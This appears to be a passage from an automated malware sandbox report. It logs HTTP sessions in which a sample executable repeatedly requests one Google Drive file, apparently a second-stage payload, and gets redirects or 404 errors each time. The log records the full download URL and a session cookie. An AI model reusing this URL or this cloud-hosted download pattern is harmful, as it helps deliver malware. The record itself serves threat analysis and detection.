                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.11.2049765142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:49 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:49 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6arl5y70PQyRDrWNpMytZQSp4tzis-6_R2Kwf-yQJ2dC7eUDn8WCfRwRAe5XX_M7xNYxa-nI4
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:49 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-3X_gkwWtI59K738p9N7fqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 49 6b 71 31 6a 75 59 4c 7a 57 4c 75 55 4f 31 79 44 4c 78 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="LIkq1juYLzWLuUO1yDLxHw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.11.2049766142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:59 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:00 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:00 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-p5OmLvObTGCdQEuqDovSkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.11.2049767142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:00 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:00 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4ptTXBTBoCC7JBURVujK9C_kF1AF1JEv7GN8u5sT4ycQ-vETjaPrWByA3vdk1bNm5NwTMDXVc
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:00 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-qk5CtqYNXSJCBebOjSD41Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:00 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 46 43 77 55 6b 34 75 50 57 53 38 39 54 46 50 66 75 4e 59 6e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZFCwUk4uPWS89TFPfuNYnw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.11.2049768142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:11 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:11 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:11 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-K_xtmXyFA1BuaPieJEG-eQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.11.2049769142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:11 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:12 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4owAQ-rszhPRwGVnM8A0PHGiS_Wsxrq_Fg_ROtqV0ttHRoZRbUHzeLJRoGMtMwRS3w
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:11 GMT
                                                                          Content-Security-Policy: script-src 'nonce-gZFSwUHLrUXlEHG4bMp8jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 52 48 64 59 73 73 5f 48 31 62 38 37 62 59 63 56 71 58 41 56 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9RHdYss_H1b87bYcVqXAVA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          24192.168.11.2049770142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:22 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:22 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:22 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-bqzhcNfZNjYP9m0bB2gk2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.11.2049771142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:23 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:34:23 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC56mYfJx7SXF7l10xCPbmiRpR_TcfO8qEGS9TjRAycG4fby3BcR9NAJkDYTbWEOI18y
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:34:23 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-M1v3c6y7Ku6SLrIGidpNMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:34:23 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 71 58 67 37 6b 2d 78 75 50 30 2d 4c 45 57 34 69 6d 7a 41 4b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5qXg7k-xuP0-LEW4imzAKg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.11.2049772142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:34:33 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
